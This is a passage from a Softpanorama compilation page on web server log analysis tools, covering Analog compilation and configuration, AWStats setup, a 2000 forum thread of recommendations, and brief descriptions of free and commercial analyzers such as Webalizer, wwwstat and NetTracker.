        ... omitted output ...
        gcc            -O2     -o ../analog alias.o analog.o cache.o dates.o
        globals.o hash.o init.o init2.o input.o macinput.o macstuff.o output.o
        output2.o outcro.o outhtml.o outlatex.o outplain.o outxhtml.o outxml.o
        process.o settings.o sort.o tree.o utils.o win32.o libgd/gd.o
        libgd/gd_io.o libgd/gd_io_file.o libgd/gd_png.o libgd/gdfontf.o
        libgd/gdfonts.o libgd/gdtables.o libpng/png.o libpng/pngerror.o
        libpng/pngmem.o libpng/pngset.o libpng/pngtrans.o libpng/pngwio.o
        libpng/pngwrite.o libpng/pngwtran.o libpng/pngwutil.o pcre/pcre.o
        zlib/adler32.o zlib/compress.o zlib/crc32.o zlib/deflate.o zlib/gzio.o
        zlib/infblock.o zlib/infcodes.o zlib/inffast.o zlib/inflate.o
        zlib/inftrees.o zlib/infutil.o zlib/trees.o zlib/uncompr.o zlib/zutil.o
        unzip/ioapi.o unzip/unzip.o bzip2/bzlib.o bzip2/blocksort.o
        bzip2/compress.o bzip2/crctable.o bzip2/decompress.o bzip2/huffman.o
        bzip2/randtable.o -lnsl -lm
        make[1]: Leaving directory `/export/home/shs/analog-6.0/src'

        $ ls -l analog
        -rwxr-xr-x   1 root     other     577568 Mar 29 19:34 analog
Once Analog was compiled, I moved it into /usr/local/bin (there was no "make install" option) and ran a "make clean" to remove object files. At this point, I had switched over to root.

The next step was setting up a configuration file to give Analog some directions on how I wanted it to work. Analog comes with example configuration files and there are numerous options that can be used to customize your reports, but I wanted to start with something simple, so I set up a handful of options and installed the file as /usr/local/bin/analog.cfg:

        # cat > /usr/local/bin/analog.cfg << EOF
        > LANGFILE usa.lng
        > HOSTNAME boson.particles.org
        > HOSTURL "http://boson.particles.org"
        > DAILYSUM ON
        > DAILYREP ON
        > LOGFILE /opt/apache/logs/access_log
        > OUTFILE /opt/apache/htdocs/webstats.html
        > DOMAINSFILE usdom.tab
        > EOF
I also had to create a directory named /usr/local/bin/lang and copy the usa.lng file and usdom.tab files from my lang directory into it.
        # mkdir /usr/local/bin/lang
        # cp lang/usa.lng /usr/local/bin/lang
        # cp lang/usdom.tab /usr/local/bin/lang
I then ran the report like this:

# analog /opt/apache/logs/access_log

My processed report appeared in my /opt/apache/htdocs directory along with four image files containing pie charts for some of my statistics. You can see a sample Analog report here.

Here's a list of features that you can turn off or on: 
MONTHLY ON       # one line for each month
WEEKLY ON        # one line for each week
DAILYREP ON      # one line for each day
DAILYSUM ON      # one line for each day of the week
HOURLYREP ON     # one line for each hour of the day
GENERAL ON       # the General Summary at the top
REQUEST ON       # which files were requested
FAILURE ON       # which files were not found
DIRECTORY ON     # Directory Report
HOST ON          # which computers requested files
ORGANISATION ON  # which organisations they were from
DOMAIN ON        # which countries they were in
REFERRER ON      # where people followed links from
FAILREF ON       # where people followed broken links from
SEARCHQUERY ON   # the phrases and words they used...
SEARCHWORD ON    # ...to find you from search engines
BROWSERSUM ON    # which browser types people were using
OSREP ON         # and which operating systems
FILETYPE ON      # types of file requested
SIZE ON          # sizes of files requested
STATUS ON        # number of each type of success and failure

Internet Access Monitor for Squid 2.4d - Monitoring of company's Internet access usage

Download Internet Access Monitor for Squid free - 2.01 Mb

Internet Access Monitor is a comprehensive Internet use monitoring and reporting utility for corporate networks. The program takes advantage of the fact that most corporations provide Internet access through proxy servers, like MS ISA Server, WinGate, WinRoute, MS Proxy, WinProxy, EServ, Squid, Proxy Plus and others. Each time any user accesses any website, downloads files or images, these actions are logged. Internet Access Monitor processes these log files to offer system administrators wealth of report building options. The program can build reports for individual users, showing the list of websites he or she visited, along with a detailed break down of internet activity (downloading, reading text, viewing pictures, watching movies, listening to music, working). Plus, the program can create comprehensive reports with analysis of overall bandwidth consumption, building easy to comprehend visual charts that suggest the areas where wasteful bandwidth consumption may be eliminated.

A good and free Perl http log analysis script - awstats

There are a lot of free http log file analysis tools out there that haven't been updated since the mid 90's, awstats however few are both free, and up to date. AWSTAT is one of the latter.

There are a lot of free http log file analysis tools out there that haven't been updated since the mid 90's, awstats however is both free, and up to date. It looks a bit like web trends (though I haven't used web trends in several years). Here's an online demo. awstats can be used on several web servers including IIS, and Apache. You can either have generate static html files, or run with a perl script in the cgi-bin.

Here's a quick rundown of setting it up on unix/apache

Each virtual web site you want to track stats for should have a file /etc/awstats.sitename.conf the directives for the configuration file can be found here: http://awstats.sourceforge.net/docs/awstats_config.html they also provide a default conf file in cgi-bin/awstats.model.conf you can use this as a base.

Make sure your log files are using NCSA combined format, this is usually done in apache by saying CustomLog /logs/access.log combined you can use other formats but you have to customize the conf file.

You will probably want to edit the LogFile directive to point to where your logfile is stored, SiteDomain this is the main domain for the site, HostAliases lets you put in other domains for the site, and the DirData directive lets you specify where the awstats databases will be stored (each site will have its own file in the directory).

Once that is setup you will want to update the database this is done from the command line by running

perl awstats.pl -config=sitename -update 

Now copy everything in the wwwroot folder to a web root, and visit http://sitename.com/cgi-bin/awstats.pl if you want to view other domains use /cgi-bin/awstats.pl?config=othersitename

Where sitename would be the name of your config file awstats.sitename.conf

If you want to generate static html files run the awstats_buildstaticpages.pl script found in the tools folder. You have to give it the path to the awstats.pl perl script, and a directory to put the static html files in.

perl awstats_buildstaticpages.pl -config=sitename -awstatsprog=/web/cgi-bin/awstats.pl 
  -dir=/web/stats/sitename/
More setup info can be found here: http://awstats.sourceforge.net/docs/index.html 

AWStats - Free log file analyzer for advanced statistics (GNU GPL).

Flexible and robust Perl written WEB log analyser. Industrial strength ! Highly recommended..

AWStats is a free powerful and featureful tool that generates advanced web, ftp or mail server statistics, graphically. This log analyzer works as a CGI or from command line and shows you all possible information your log contains, in few graphical web pages. It uses a partial information file to be able to process large log files, often and quickly. It can analyze log files from IIS (W3C log format), Apache log files (NCSA combined/XLF/ELF log format or common/CLF log format), WebStar and most of all web, proxy, wap, streaming servers, mail servers (and some ftp).
Take a look at this comparison table for an idea on differences between most famous statistics tools (AWStats, Analog, Webalizer,...).
AWStats is a free software distributed under the GNU General Public License. You can have a look at this license chart to know what you can/can't do.
As AWStats works from the command line but also as a CGI, it can work with major web hosting provider that allows CGI and log access.

You can browse AWStats demo (Real-time feature to update stats from web has been disabled on demos) to see a sample of most important information AWStats shows you...

[Aug 29, 2000 ] Recommendations for log analysis software

I'm looking for access log analysis software that will run independently from the ACS. Hopefully the thing would read an AOLserver or Apache access log and generate some graphs and tables in a configurable way. Any specific suggestions? The goal is usage analysis for marketing purposes (i.e., not performance analysis). Probably running on Solaris and it doesn't have to be freeware.

-- S. Y., August 29, 2000

I've been using webalizer (http://www.webalizer.com). It's real easy to set up and configure. For a sample of what it does, check out http://www.badgertronics.com/reports
-- Mark Dalrymple, August 29, 2000

And if you don't mind paying, NetTracker (from http://www.sane.com) has a ton of reports, handles big log files (a site we know that's using it has 600 meg daily access logs), handles cobranding, etc
-- Mark Dalrymple, August 29, 2000

Nettracker rules! We've been using it for a couple of years now and everyone loves it. It has no knowledge of the ACS or it's users, of coures, so real clickstream tracking isn't really possible, but for basic log analysis with lots of information it's great.
-- Janine Sisk, August 29, 2000

I worked quite a while with NetAnalysis by the Boston-based company NetGen. It's database-backed log file analysis software, i .e. usually once per day you stuff your log file information into your db. This way you can keep track of your homepage's success over time. It also enables you to connect your webserver log information with information from other databases and come up with really powerful information. For example it has pretty damn good adaptors to Intershop and to Vignette StoryServer and you can implement your own adaptors with a Perl-based (soon to be Java) API. (Why do I know these adaptors are good? I made the one for Intershop work properly and I specified the one for my former company's Vignette StoryServer standard installation ;)

The software to run analysis on your log is very smartly configurable and you have good metrics and I was promised some really powerful metrics for a future release (that should be out as of now).

It runs on Solaris and you'll need Oracle and a pretty heavy machine (way bigger than your webserver usually).

Other products I know about are Accrue (used to be based on sniffing TCP/IP packets) and iDecide by Informix (has another name these days) that are db-backed as well. Oh, and then I once met with a Canadian company that use JavaScript to spy out some information about the client. It was probably the most expensive software regarding costs/line of code - tho they had very, very, very good metrics. You can head over to playboy.com and look for a JS call on their entry site ;)

regards Dirk
-- Dirk Gómez, August 30, 2000

I have had great success with 'analog' a free utility for log parsing and analysis. It can generate simple reports and also machine readable reports (good for DB backed summary generation). There is also a perl based package called 'Report Magic' which takes the machine readable output and makes pretty pictures and tables for you.

The problem with many Log analysis tools is that they cannot be consumate and definately cannot reflect the structure of your particular site especially if it has 'interesting' mechanisms by which content is rendered - frames, multiple urls for a given page etc. Also, when you get ~ 1GB of log data a day, some cjust croak big time. In this case, rolling-your-own is one solution whih I have been implementing (using perl -regexp is you friend- and DB) which follows some of the principles discussed at ASJ/. It also allows for simple reporting on only the bits n pieces I feel necessary - quick with HUGE sets of data.

This is a good technique for allowing ad-hoc queries on data but make sure you have a reasonably hefty machine (Dual Xeon with 2GB RAM, 100GB RAID).

I guess if there is a package out there which is extensible and modular (plugin support as mentioned above) then that may also be quite useful.

It's important to define exactly what info is most important in analysing logs else you can open up a huge can of worms - ie. mapping all relationships between everything which whilst interesting, is quite difficult and reasonalby useless unless it is quick and can add value in some way.

Sorry if I've stated the obvious, just my $0.05
-- geoff webb, September 4, 2000

Look carefully before you choose NetTracker. It scans the log files and saves the data into its own flat file database. If you ever lose files or decide that you want to add another report, it needs to regenerate all of that data. For a month's worth of logs (the 600 MB+ logs referred to by Mark Dalrymple above), it can take 3+ days.
-- Doug Harris, September 11, 2000

PAGE-STATS

page-stats.pl will examine the acceslog of a http daemon and search it for occurrences of certain references. These references are then counted and put into a HTML file that is ready to be displayed to the outside world as a "Page Statistics" page. Each page can be selected from the statistics page.

The Big Brother Log Analyzer (BBLA)

Perl and C

Big Brother Log Analyzer, or BBLA for short, is a package comprised of two components: a logger, which logs all accesses to selected web pages, and a log analyzer, which nicely formats the logs into an HTML page. The generated HTML is fully W3C compliant (HTML 4.01/Transitional), which guarantees that it will be rendered the way it should under any compliant browser. Another interesting feature of BBLA is that it is tag-based (you put a tag in each page you want to track): this allows for tracking pages hosted on different servers. For instance, I track accesses to my pages in the School of Information Management and Systems at the University of California, Berkeley, along with these pages hosted on SourceForge in a single file. See the demo for more information.

A lot of HTML log analyzers exist on the market, but most of them are either targeted at systems administrators (with full access to httpd log files, for instance), or require general users to display an advertising banner on their pages, or (even worse) limit the number of pages you can track for free. Most of the time, the pages generated do not even follow the W3C consortium recommendations for writing proper HTML, yielding unpredictable results when viewed with different browsers.

BBLA is free, doesn't require you to have a banner on your web page, uses W3C-compliant HTML and PNG images (hence, no licensing issues with GIFs), allows for tracking pages hosted on different servers, and is actually completely transparent. So, unless your visitors look into your HTML source, they won't notice that you are tracking them.

Last but not least, BBLA is extremely light-weight: the current tarball is roughly 30KB, making it much more easier to install on platforms with scarce disk space than some of its counterparts. As an added bonus, it doesn't take ages to compile, even on really ancient hardware.

Relax log analyzer

freshmeat.net

Relax is a multi-platform Web server log analyzer written in Perl. It can be used to track which search engines, search keywords, and referring URLs led visitors to the Web site. It can also track down bad links and analyze which keywords to bid for at pay-per-click search engines. The parser module in Relax recognizes several hundred search engines and is capable of extracting the keywords used. Generated HTML reports can be configured to include links to other Web-based keyword analysis tools, making it easier to further improve the ranking of web pages in search engines.

proxy-report.pl

freshmeat.net

proxy-report.pl generates a list of requested server addresses (simplified URLs) from your Squid proxy server log files. Requests for each URL are summarized on a per day basis. This script can generate reports based on the IP of the user. It also automatically handles gzipped files. URL exclusion patterns are supported. A sample report is available on the home page.

Calamaris Home Page

parses logfiles from Squid, NetCache, Inktomi Traffic Server,

Recommended Links

Softpanorama hot topic of the month

Softpanorama Recommended

Top articles

Sites

Book chapters

freshmeat.net Browse project tree - Topic Internet Log Analysis

Google Directory - Computers Software Internet Site Management Log Analysis

Produces highly detailed, easily configurable, incremental HTML usage reports in many languages, from multiple log formats, with builds for Linux, Solaris, Mac, OS/2, Cobalt, OpenVMS, Netware, and BeOS. [Open Source, GPL]


Articles

Selected Perl log processing scripts

WebStats - xenia - set of perl scripts and sqlite database for apache web log analysis

logmanage

logmanage is a program which is designed to perform flexible management of web statistics for a variety of users and main server logs. In its current configuration it is designed to work with http-analyze but should work with any web stats program that takes log input on STDIN and can be configured for the output directory on the command line. Manages a large collection of pipes to the stats program with inclusion and exclusion regular expressions. Can generate stats for lots of different users from one log file or from many log files.

recycle-logs

Recycle-logs is a logfile manager written in Perl that attempts to overcome the limitations of other system log utilities. File rotation and other customization is based on control information specified in one or several configuration files.

W3Perl

W3Perl is a Web logfile analyzer. All major Web stats are available (referrer, agent, session, error, etc.). Reports are fully customizable via configuration files, and there is an administration interface control available.

Webalizer

Webalizer The Webalizer is a fast, free web server log file analysis program. It produces highly detailed, easily configurable usage reports in HTML format, for easy viewing with a standard web browser.

wwwstat

wwwstat HTTPd Logfile Analysis Software

The wwwstat program will process a sequence of HTTPd common logfile format (CLF) access_log files and output a log summary in HTML format suitable for publishing on a website.

The splitlog program will process a sequence of CLF (or CLF with a prefix) access_log files and split the entries into separate files according to the requested URL and/or vhost prefix.

Both programs are written in Perl and, once customized for your site, should work on any UNIX-based system with Perl 4.036, 5.002, or better.

Qiegang Long, formerly at UMass, has released a program called gwstat that takes the output from wwwstat and generates a set of graphs to illustrate your httpd server traffic by hour, day, week or calling country/domain.

A mailing list, now shut down, was created for discussion and support of wwwstat development.

Etc Perl Scripts

Log Scanner 0.9b

Log Scanner was written to watch for anomalies in log files. Upon finding them, it can notify you in a variety of ways. It was designed to be very modular and configurable. Unlike most other log scanners, this one has more than single pattern matches. It will allow you to trigger notifications on multiple occurrences of one or several events.


Graphic


C-based Products


Commercial Products

FlashStats Mac
Unix
Windows
$99/$249 Maximized Software
HTTP-Analyze Unix
Windows
free/326 euro/388 euro/1470 euro http://www.http-analyze.org/
Lumberjack Unix $1250 BitWrench Inc
NetTracker Unix, Windows from $495 Sane Solutions
WebTrends Windows
Solaris
Red Hat
$499 - $1999 NetIQ
Sawmill Mac
Unix
Windows
$999 Substantial discounts for edu & small organisations sawmill.net

Web Trends -- actually a pretty limited commercial package. Decent prepackaged reporting capabilities, but not very flexible (reports for dummies)


Random Findings

EasyLog version 1.2
This is a simple Server Side Includes script that can "watch" a given page, and add entries to a HTML file reporting what browser they are using, when they accessed your page, and a few other pieces of information. Language: Perl Platform: Unix View Product Homepage

Checklog version 1.0
Perl script that analyzes HTTP server logs.

Language: Perl Platform: Unix, Windows

View Product Homepage

Download Complete Source Code, 0.010M bytes

Click file name to view online:
checklog.pl, 14504 bytes

FTPWebLog version 1.0.3
Perl script that analyses WWW and FTP logs and produces graphical reports.

Language: Perl Platform: Unix, Windows

View Product Homepage

Download Complete Source Code, 0.096M bytes

Relax version 2.0
Relax is a free reference log analysis program written in Perl, which can be used to analyse how people are finding your web site, what keywords they use in the search engines, and how they move within the site.

Language: Perl Platform: Unix, Windows

View Product Homepage

Download Complete Source Code, 0.010M bytes

Log Reverse Domain Name System (lrdns) version 1.1 -- Converts numeric IP addresses in accesss log files into textual domain names. Language: Perl Platform: Unix

View Product Homepage

Download Complete Source Code, 0.010M bytes

See also



Etc

FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available in our efforts to advance understanding of environmental, political, human rights, economic, democracy, scientific, and social justice issues, etc. We believe this constitutes a 'fair use' of any such copyrighted material as provided for in section 107 of the US Copyright Law. In accordance with Title 17 U.S.C. Section 107, the material on this site is distributed without profit exclusivly for research and educational purposes.   If you wish to use copyrighted material from this site for purposes of your own that go beyond 'fair use', you must obtain permission from the copyright owner. 

ABUSE: IPs or network segments from which we detect a stream of probes might be blocked for no less then 90 days. Multiple types of probes increase this period.  

Society

Groupthink : Two Party System as Polyarchy : Corruption of Regulators : Bureaucracies : Understanding Micromanagers and Control Freaks : Toxic Managers :   Harvard Mafia : Diplomatic Communication : Surviving a Bad Performance Review : Insufficient Retirement Funds as Immanent Problem of Neoliberal Regime : PseudoScience : Who Rules America : Neoliberalism  : The Iron Law of Oligarchy : Libertarian Philosophy

Quotes

War and Peace : Skeptical Finance : John Kenneth Galbraith :Talleyrand : Oscar Wilde : Otto Von Bismarck : Keynes : George Carlin : Skeptics : Propaganda  : SE quotes : Language Design and Programming Quotes : Random IT-related quotesSomerset Maugham : Marcus Aurelius : Kurt Vonnegut : Eric Hoffer : Winston Churchill : Napoleon Bonaparte : Ambrose BierceBernard Shaw : Mark Twain Quotes

Bulletin:

Vol 25, No.12 (December, 2013) Rational Fools vs. Efficient Crooks The efficient markets hypothesis : Political Skeptic Bulletin, 2013 : Unemployment Bulletin, 2010 :  Vol 23, No.10 (October, 2011) An observation about corporate security departments : Slightly Skeptical Euromaydan Chronicles, June 2014 : Greenspan legacy bulletin, 2008 : Vol 25, No.10 (October, 2013) Cryptolocker Trojan (Win32/Crilock.A) : Vol 25, No.08 (August, 2013) Cloud providers as intelligence collection hubs : Financial Humor Bulletin, 2010 : Inequality Bulletin, 2009 : Financial Humor Bulletin, 2008 : Copyleft Problems Bulletin, 2004 : Financial Humor Bulletin, 2011 : Energy Bulletin, 2010 : Malware Protection Bulletin, 2010 : Vol 26, No.1 (January, 2013) Object-Oriented Cult : Political Skeptic Bulletin, 2011 : Vol 23, No.11 (November, 2011) Softpanorama classification of sysadmin horror stories : Vol 25, No.05 (May, 2013) Corporate bullshit as a communication method  : Vol 25, No.06 (June, 2013) A Note on the Relationship of Brooks Law and Conway Law

History:

Fifty glorious years (1950-2000): the triumph of the US computer engineering : Donald Knuth : TAoCP and its Influence of Computer Science : Richard Stallman : Linus Torvalds  : Larry Wall  : John K. Ousterhout : CTSS : Multix OS Unix History : Unix shell history : VI editor : History of pipes concept : Solaris : MS DOSProgramming Languages History : PL/1 : Simula 67 : C : History of GCC developmentScripting Languages : Perl history   : OS History : Mail : DNS : SSH : CPU Instruction Sets : SPARC systems 1987-2006 : Norton Commander : Norton Utilities : Norton Ghost : Frontpage history : Malware Defense History : GNU Screen : OSS early history

Classic books:

The Peter Principle : Parkinson Law : 1984 : The Mythical Man-MonthHow to Solve It by George Polya : The Art of Computer Programming : The Elements of Programming Style : The Unix Hater’s Handbook : The Jargon file : The True Believer : Programming Pearls : The Good Soldier Svejk : The Power Elite

Most popular humor pages:

Manifest of the Softpanorama IT Slacker Society : Ten Commandments of the IT Slackers Society : Computer Humor Collection : BSD Logo Story : The Cuckoo's Egg : IT Slang : C++ Humor : ARE YOU A BBS ADDICT? : The Perl Purity Test : Object oriented programmers of all nations : Financial Humor : Financial Humor Bulletin, 2008 : Financial Humor Bulletin, 2010 : The Most Comprehensive Collection of Editor-related Humor : Programming Language Humor : Goldman Sachs related humor : Greenspan humor : C Humor : Scripting Humor : Real Programmers Humor : Web Humor : GPL-related Humor : OFM Humor : Politically Incorrect Humor : IDS Humor : "Linux Sucks" Humor : Russian Musical Humor : Best Russian Programmer Humor : Microsoft plans to buy Catholic Church : Richard Stallman Related Humor : Admin Humor : Perl-related Humor : Linus Torvalds Related humor : PseudoScience Related Humor : Networking Humor : Shell Humor : Financial Humor Bulletin, 2011 : Financial Humor Bulletin, 2012 : Financial Humor Bulletin, 2013 : Java Humor : Software Engineering Humor : Sun Solaris Related Humor : Education Humor : IBM Humor : Assembler-related Humor : VIM Humor : Computer Viruses Humor : Bright tomorrow is rescheduled to a day after tomorrow : Classic Computer Humor

The Last but not Least


Copyright © 1996-2016 by Dr. Nikolai Bezroukov. www.softpanorama.org was created as a service to the UN Sustainable Development Networking Programme (SDNP) in the author free time. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License.

The site uses AdSense so you need to be aware of Google privacy policy. You you do not want to be tracked by Google please disable Javascript for this site. This site is perfectly usable without Javascript.

Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.

FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available to advance understanding of computer science, IT technology, economic, scientific, and social issues. We believe this constitutes a 'fair use' of any such copyrighted material as provided by section 107 of the US Copyright Law according to which such material can be distributed without profit exclusively for research and educational purposes.

This is a Spartan WHYFF (We Help You For Free) site written by people for whom English is not a native language. Grammar and spelling errors should be expected. The site contain some broken links as it develops like a living tree...

You can use PayPal to make a contribution, supporting development of this site and speed up access. In case softpanorama.org is down you can use the at softpanorama.info

Disclaimer:

The statements, views and opinions presented on this web page are those of the author (or referenced source) and are not endorsed by, nor do they necessarily reflect, the opinions of the author present and former employers, SDNP or any other organization the author may be associated with. We do not warrant the correctness of the information provided or its fitness for any purpose.

Last modified: September 12, 2017